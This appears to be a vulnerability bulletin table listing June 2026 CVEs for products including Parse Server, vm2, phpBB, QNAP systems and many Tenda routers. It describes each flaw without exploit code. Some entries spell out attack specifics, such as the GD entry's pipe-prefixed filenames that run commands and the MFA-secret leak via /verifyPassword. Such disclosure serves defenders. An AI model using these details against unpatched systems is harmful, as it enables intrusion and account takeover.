| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. From version 9.8.0 to before version 9.9.1-alpha.5, apps that enable MFA and deny get on the _User class via Class-Level Permissions could expose sensitive user data through the /login and /verifyPassword endpoints. These endpoints re-fetch the user through the access-controlled query pipeline (CLP, protectedFields, auth-adapter sanitizers) before responding. When that re-fetch was denied by the _User get permission, the server fell back to the raw database row, exposing raw authData (including MFA TOTP secrets and recovery codes) and fields hidden by protectedFields (when protectedFieldsOwnerExempt is false). /verifyPassword is the most severe: with only a username and password (no session or MFA token), an attacker who knows a victim's password could retrieve their MFA secret and recovery codes, defeating the second factor. This issue has been patched in version 9.9.1-alpha.5. | 2026-06-12 | not yet calculated | CVE-2026-53725 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.80 and 9.9.1-alpha.6, a relation query using the $relatedTo operator could read the membership of a Relation field even when that field was hidden from the requesting client by protectedFields, and even when the object owning the relation was not readable by the client under its ACL or class-level permissions. The request requires only the public API credentials that Parse clients normally carry - no user session, master key, or Cloud Code is needed. As a result, an unauthenticated client who knows or obtains the owning object's objectId could enumerate the objects linked through a protected relation, or combine the operator with an objectId constraint to use it as a membership oracle - confirming whether a specific object is linked to a private parent. This affects applications that rely on protectedFields or object ACLs to keep Relation membership confidential, such as private group memberships, block lists, or account-to-resource associations. This issue has been patched in versions 8.6.80 and 9.9.1-alpha.6. | 2026-06-12 | not yet calculated | CVE-2026-53726 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM exposes some process-wide observability builtins when they are allowed through require.builtin. The diagnostics_channel, async_hooks, and perf_hooks builtins are not blocked by the dangerous builtin denylist. These modules are process-wide, not sandbox-local. Sandboxed code can use them to observe host application data across the vm2 boundary. This issue has been patched in version 3.11.4. | 2026-06-12 | not yet calculated | CVE-2026-47141 |
| PenguinMod--PenguinMod-BackendApi | PenguinMod-BackendApi is the backend api for penguinmod. Prior to version 1.0.0, a NoSQL injection vulnerability in the password reset endpoint allows any authenticated user to change the password of an account, leading to full account takeover. An attacker only needs a registered account and a valid password reset token for their own account. This issue has been patched in version 1.0.0. | 2026-06-11 | not yet calculated | CVE-2026-47181 |
| PEVANS--Metrics::Any::Adapter::DogStatsd | Metrics::Any::Adapter::DogStatsd versions before 0.04 for Perl do not protect against metric injection. The statsd protocol (and extensions such as dogstatsd) allow multiple metrics, separated by newlines, to be sent per packet. Metrics::Any::Adapter::DogStatsd extends Metrics::Any::Adapter::Statsd, which has a similar vulnerability. In addition, the _tags function does not check tags for newlines or statsd control characters, so the tags can be used for metric injection. | 2026-06-10 | not yet calculated | CVE-2026-50638 |
| PEVANS--Metrics::Any::Adapter::SignalFx | Metrics::Any::Adapter::SignalFx versions before 0.04 for Perl do not protect against metric injection. The statsd protocol (and extensions such as dogstatsd) allow multiple metrics, separated by newlines, to be sent per packet. Metrics::Any::Adapter::SignalFx extends Metrics::Any::Adapter::Statsd, which has a similar vulnerability. In addition, the _labels function does not check labels for newlines or statsd control characters, so the labels can be used for metric injection. | 2026-06-10 | not yet calculated | CVE-2026-50639 |
| PEVANS--Metrics::Any::Adapter::Statsd | Metrics::Any::Adapter::Statsd versions before 0.04 for Perl do not protect against metric injection. The statsd protocol (and extensions) allow multiple metrics, separated by newlines, to be sent per packet. The send method does not validate the contents of the metric names or values. If the names contain newlines or statsd control characters (colon, pipe), metric injection is possible. Version 0.04 fixed this by modifying the _make method to reject metric names containing characters below ASCII 32 (which includes the newline), colons, or pipes. | 2026-06-10 | not yet calculated | CVE-2026-50637 |
| phpBB--phpBB | Improper verification of access permissions when modifying permissions through the Administration Control Panel (ACP) allowed an authenticated administrator to grant permissions beyond the level authorized for their account, resulting in privilege escalation within the administrative interface. | 2026-06-12 | not yet calculated | CVE-2026-47366 |
| phpBB--phpBB | Improper authentication checks in the OAuth implementation allow account hijacking even when OAuth is not configured or enabled leading to unauthorized access in default installations. | 2026-06-12 | not yet calculated | CVE-2026-48611 |
| phpBB--phpBB | Improper state verification in the OAuth implementation could allow an attacker to manipulate the authentication flow and cause a victim's account to be linked to an attacker-controlled account. This can result in unauthorized account linking and potential account takeover. | 2026-06-12 | not yet calculated | CVE-2026-48612 |
| phpBB--phpBB | SQL injection vulnerability in phpBB profile field migration due to improper handling of user-supplied profile field data during migration, allowing execution of arbitrary SQL queries. Only applies to phpBB forums that had been updated from versions prior to phpBB 3.3.8 and have not been updated to 3.3.11 or newer yet. | 2026-06-12 | not yet calculated | CVE-2026-48613 |
| Ping Identity--PingDirectory | Virtual attribute handling in affected versions of Ping Identity PingDirectory allows authorized users (and only authorized users) to exhaust the Java memory heap when recent login history is enabled and virtual attributes that reference ds-privilege-name values are copied. | 2026-06-12 | not yet calculated | CVE-2026-20746 |
| Plonky3--Plonky3 | Plonky3 is a toolkit for polynomial IOPs (PIOPs). Prior to versions 0.4.3 and 0.5.3, an attacker controlling prover-side observations can craft distinct transcripts that produce identical challenges, breaking the binding property of Fiat-Shamir. This issue has been patched in versions 0.4.3 and 0.5.3. | 2026-06-10 | not yet calculated | CVE-2026-46654 |
| pretix--pretix | When creating an export of all reusable media, the secrets of connected gift cards were included in the export even if the user creating the export does not have permission to view gift cards. This is inconsistent with the UI and API where only the first letters of the gift card secret are shown. Therefore, it allows circumventing a permission boundary. | 2026-06-09 | not yet calculated | CVE-2026-11764 |
| Python Software Foundation--CPython | bz2.BZ2Decompressor objects could be reused after a decompression error. If an application caught the resulting OSError and retried with the same decompressor, crafted input could cause the decompressor to resume from an invalid internal state and perform out-of-bounds writes to a stack buffer. This could crash the process when processing untrusted data. | 2026-06-08 | not yet calculated | CVE-2026-9669 |
| QNAP Systems Inc.--File Station 5 | A NULL pointer dereference vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5208 and later | 2026-06-10 | not yet calculated | CVE-2026-22899 |
| QNAP Systems Inc.--File Station 5 | An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-24720 |
| QNAP Systems Inc.--File Station 5 | An incorrect authorization vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to bypass intended access restrictions. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-24724 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5208 and later | 2026-06-10 | not yet calculated | CVE-2026-26239 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-26240 |
| QNAP Systems Inc.--File Station 5 | A buffer overflow vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5243 and later | 2026-06-10 | not yet calculated | CVE-2026-26241 |
| QNAP Systems Inc.--License Center | A path traversal vulnerability has been reported to affect License Center. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: License Center 1.9.56 and later | 2026-06-10 | not yet calculated | CVE-2025-62851 |
| QNAP Systems Inc.--Notification Center | A cross-site request forgery (CSRF) vulnerability has been reported to affect Notification Center. The remote attackers can then exploit the vulnerability to gain privileges or hijack user identities. We have already fixed the vulnerability in the following version: Notification Center 1.10.0.3291 and later | 2026-06-10 | not yet calculated | CVE-2025-58468 |
| QNAP Systems Inc.--QTS | QTS, QuTS hero, QuTScloud are not affected. We have already fixed the vulnerability in the following version: | 2026-06-10 | not yet calculated | CVE-2025-59382 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-09 | not yet calculated | CVE-2025-62858 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66273 |
| QNAP Systems Inc.--QTS | QuTS hero is not affected. We have already fixed the vulnerability in the following version: QTS 5.2.7.3256 build 20250913 and later | 2026-06-10 | not yet calculated | CVE-2025-66276 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66279 |
| QNAP Systems Inc.--QTS | An integer overflow or wraparound vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to compromise the security of the system. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66280 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3397 build 20260206 and later | 2026-06-10 | not yet calculated | CVE-2025-66281 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3410 build 20260214 and later QuTS hero h5.2.9.3410 build 20260214 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-22893 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-24716 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2026-24717 |
| QNAP Systems Inc.--QTS | A command injection vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later | 2026-06-10 | not yet calculated | CVE-2026-24719 |
| QNAP Systems Inc.--QTS | A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QTS 5.2.9.3492 build 20260507 and later QuTS hero h5.2.9.3499 build 20260514 and later QuTS hero h5.3.4.3500 build 20260520 and later QuTS hero h6.0.0.3500 build 20260520 and later | 2026-06-09 | not yet calculated | CVE-2026-41539 |
| QNAP Systems Inc.--QuMagie | A missing authorization vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to access unauthorized data or perform unauthorized actions. We have already fixed the vulnerability in the following version: QuMagie 2.9.0 and later | 2026-06-09 | not yet calculated | CVE-2026-26236 |
| QNAP Systems Inc.--QuMagie | A missing authorization vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to access unauthorized data or perform unauthorized actions. We have already fixed the vulnerability in the following version: QuMagie 2.9.0 and later | 2026-06-10 | not yet calculated | CVE-2026-26237 |
| QNAP Systems Inc.--QuMagie | An authorization bypass through user-controlled key vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to gain unintended privileges. We have already fixed the vulnerability in the following version: QuMagie 2.9.1 and later | 2026-06-09 | not yet calculated | CVE-2026-44083 |
| QNAP Systems Inc.--QuTS hero | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QuTS hero h5.2.9.3410 build 20260214 and later; QuTS hero h5.3.4.3500 build 20260520 and later; QuTS hero h6.0.0.3459 build 20260409 and later | 2026-06-10 | not yet calculated | CVE-2025-62850 |
| raszi--node-tmp | tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6. | 2026-06-11 | not yet calculated | CVE-2026-44705 |
| Redmine--Redmine | The system stores the username and password from the login form after submitting the request. This could allow an attacker with access to the platform to return to the browser and view the login credentials. | 2026-06-12 | not yet calculated | CVE-2026-1836 |
| RURBAN--GD | GD versions before 2.86 for Perl allow OS command injection and file overwrite via a 2-arg open() of filename arguments in _make_filehandle. GD::Image::_make_filehandle opens a filename argument with Perl's 2-arg open(), so a filename that begins or ends with a pipe ("| cmd", "cmd |") or begins with a redirect ("> path", ">> path") is run as a command or redirect rather than opened as a file. _make_filehandle is the single open path behind every filename-accepting constructor (new, newFromPng, newFromJpeg, and the rest); the in-memory *Data variants do not open a path and are unaffected. Any caller that forwards untrusted input to one of these constructors as a pathname can run an arbitrary command or truncate a file under the process UID. | 2026-06-14 | not yet calculated | CVE-2026-11526 |
| Schneider Electric--EcoStruxure IT Data Center Expert | A CWE-611 Improper Restriction of XML External Entity Reference vulnerability exists that could cause information disclosure of server-side file contents when an attacker with a Data Center Expert user account submits crafted XML payloads to SOAP service endpoints. | 2026-06-09 | not yet calculated | CVE-2026-8045 |
| SemCms--SemCms | SemCms 5.0 is vulnerable to Cross Site Request Forgery (CSRF) via a crafted POST request to /admin/semcms_user.php. | 2026-06-09 | not yet calculated | CVE-2026-39170 |
| SEMCMS--SEMCMS | SEMCMS 5.0 is vulnerable to unauthorized access in SEMCMS_copy.php. | 2026-06-09 | not yet calculated | CVE-2026-39169 |
| Setasign--FPDI | FPDI is a collection of PHP classes that facilitate reading pages from existing PDF documents and using them as templates in FPDF. Prior to version 2.6.7, an attacker can upload a small, malicious PDF file that will cause the server-side script to crash due to memory exhaustion or a script time-out. Repeated attacks can lead to sustained service unavailability. This issue has been patched in version 2.6.7. | 2026-06-11 | not yet calculated | CVE-2026-45802 |
| Shenzhen Kangda Xin Intelligent Network Technology Co., Ltd--DR300 | Shenzhen Kangda Xin Intelligent Network Technology Company's router, model DR300, version 2.1.2.121, contains hardcoded login credentials and has telnet enabled by default on WAN and LAN interfaces. These vulnerabilities allow attackers to read and write to memory, modify firmware stored in flash, inspect active connections, and view currently connected devices. | 2026-06-09 | not yet calculated | CVE-2026-10045 |
| Shenzhen Tenda Technology Co. Ltd--Tenda AC1206 | Shenzhen Tenda Technology Co., Ltd Tenda AC1206 v15.03.06.23 was discovered to contain multiple stack overflows in the fromGstDhcpSetSer function via the username and password parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-08 | not yet calculated | CVE-2026-36789 |
| Shenzhen Tenda Technology Co. Ltd--Tenda FH451 | Shenzhen Tenda Technology Co., Ltd Tenda FH451 V1.0.0.9 was discovered to contain a stack overflow in the list1 parameter of the fromDhcpListClient function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-08 | not yet calculated | CVE-2026-36786 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a stack overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36796 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a stack overflow in the IPMacBindRuleIp parameter of the formIPMacBindModify function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36797 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain multiple stack overflows in the formSetDebugCfgr function via the enable, level, and module parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36798 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the portalAuth parameter of the formPortalAuth function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36799 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the IPMacBindIndex parameter of the formIPMacBindDel function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36800 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain a buffer overflow in the IPMacBindRule parameter of the formIPMacBindAdd function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36801 |
| Shenzhen Tenda Technology Co. Ltd--Tenda GO | Shenzhen Tenda Technology Co., Ltd Tenda G0 v15.11.0.5 was discovered to contain multiple buffer overflows in the Saveqqlist function via the qqStr and markStr parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36805 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the username parameter of the R7WebsSecurityHandler function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36778 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain multiple stack overflows in the fromVirtualSer function via the puVar2, puVar1, __s2, __s1_00, and puVar3 parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36779 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the domain parameter of the fromNetToolGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36783 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda O3 Wireless Router v1.0.0.5(4180) was discovered to contain a stack overflow in the ip parameter of the fromNetToolGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via an HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36784 |
| Shenzhen Tenda Technology Co. Ltd--Tenda O3v3 | Shenzhen Tenda Technology Co., Ltd Tenda O3v3 v1.0.0.5 was discovered to contain a stack overflow in the save_list_data parameter of the formSetCfm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36791 |
| Shenzhen Tenda Technology Co. Ltd--Tenda PW201A | Shenzhen Tenda Technology Co., Ltd Tenda PW201A v1.0.5 was discovered to contain a buffer overflow in the page parameter of the SafeMacFilter function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36802 |
| Shenzhen Tenda Technology Co. Ltd--Tenda PW201A | Shenzhen Tenda Technology Co., Ltd Tenda PW201A v1.0.5 was discovered to contain a buffer overflow in the page parameter of the qossetting function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36803 |
| Shenzhen Tenda Technology Co. Ltd--Tenda US_W3V1.0BR | Shenzhen Tenda Technology Co., Ltd Tenda US_W3V1.0BR v1.0.0.3 was discovered to contain a stack overflow in the Go parameter of the ask_to_reboot function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36770 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserPwd parameter of the formModifyWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36806 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserPwd parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36807 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthUserInfo parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36808 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthWhiteID parameter of the formModifyWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36809 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the gotoUrl parameter of the formPortalAuth function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36810 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the picName parameter of the formDelwebAuthPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36811 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36813 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the hostname parameter of the formSetNetCheckTools function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36815 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the wewifiWhiteUserInfo parameter of the formAddWewifiWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36816 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W15E | Shenzhen Tenda Technology Co., Ltd Tenda W15E v15.11.0.10 was discovered to contain a buffer overflow in the webAuthWhiteUserInfo parameter of the formAddWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36817 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the wewifiWhiteUserInfo parameter of the formAddWewifiWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36818 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the bindMACAddr parameter of the fromSetDhcpRules function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36819 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the webAuthWhiteUserInfo parameter of the formAddWebAuthWhiteUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36820 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36821 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the macAddr parameter of the formDelStaState function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36822 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W20E | Shenzhen Tenda Technology Co., Ltd Tenda W20E v15.11.0.6 was discovered to contain a buffer overflow in the webAuthUserInfo parameter of the formAddWebAuthUser function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36823 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formwrlSSIDset function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36771 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formwrlSSIDget function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36772 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the Go parameter of the ask_to_reboot function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-06-09 | not yet calculated | CVE-2026-36773 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the param_1 parameter of the formSetCfm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36777 |
